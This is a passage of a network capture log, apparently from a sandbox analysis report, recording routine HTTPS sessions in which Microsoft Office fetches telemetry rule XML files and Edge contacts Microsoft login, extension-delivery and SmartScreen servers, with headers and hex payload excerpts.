<O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	52987	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1b068de9-201e-0085-515f-2e34e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-17df447cdb5c9wvxhC1DFWn08n000000070g00000000fhzk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.7	52990	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 12ef7264-e01e-003c-02a0-31c70b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-17df447cdb54qlp6hC1DFWqcfc00000006q000000000hbnz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.7	52988	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-16547b76f7f7jnp2hC1DFWfc300000000ak0000000006a1z x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	52976	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-09 01:47:32 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-09 01:47:32 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 09 Nov 2024 01:46:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_BL2 x-ms-request-id: fb1936d2-5ba5-49d1-b1c0-81d3c391e1a5 PPServer: PPV: 30 H: BL02EPF0001DA05 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 09 Nov 2024 01:47:31 GMT Connection: close Content-Length: 1276
2024-11-09 01:47:32 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.7	53004	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:32 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014732Z-16547b76f7fp6mhthC1DFWrggn0000000apg000000001hzf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.7	53003	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:32 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: ed27c552-101e-007a-705f-2e047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014732Z-15869dbbcc65c582hC1DFWgpv4000000045g00000000h4wr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.7	53005	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:33 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: c4c8fc32-f01e-0096-298e-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014732Z-15869dbbcc6m5ms4hC1DFWqm4w000000027000000000m75y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:33 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.7	53007	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:32 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014732Z-16547b76f7fkcrm9hC1DFWxdag0000000amg000000008ecn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.7	53006	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:32 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 289a03c5-801e-0015-6466-2ff97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014732Z-15869dbbcc6pfq2ghC1DFWmp1400000003r000000000fzp6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	53012	23.218.232.185	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:32 UTC	614	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731721649&P2=404&P3=2&P4=XFHiHjFHGhLTg2CaSghZ5WWINN8z%2fN551jQLygkYavsrdRzdPI5ot2rwp4oOaepK7XWbIGdutkBX4tfgiArgMQ%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: vk9rEZqPlGo/f2vF7QD5nD Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:33 UTC	1217	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: a30792a1-e43d-4521-b9ea-ac3d7d819e62 MS-RequestId: 6d154753-539f-49b2-a179-9526d5f4ced0 MS-CV: rnL77OnQ5ScZk1HlJ5L1Z/.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86396 Date: Sat, 09 Nov 2024 01:47:33 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.193.38.11,b=512053829,c=g,n=US_TX_IRVING,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.0b26c117.1731116853.1e855245 Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-09 01:47:33 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	53014	13.91.96.185	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	734	OUT	POST /api/browser/edge/data/toptraffic/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiNEpGSzNPbktmQ0Q0bW9VNEdZOXNzZz09IiwgImhhc2giOiJqUzNGbVFuYm8yTT0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "170540185939602997400506234197983529371" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
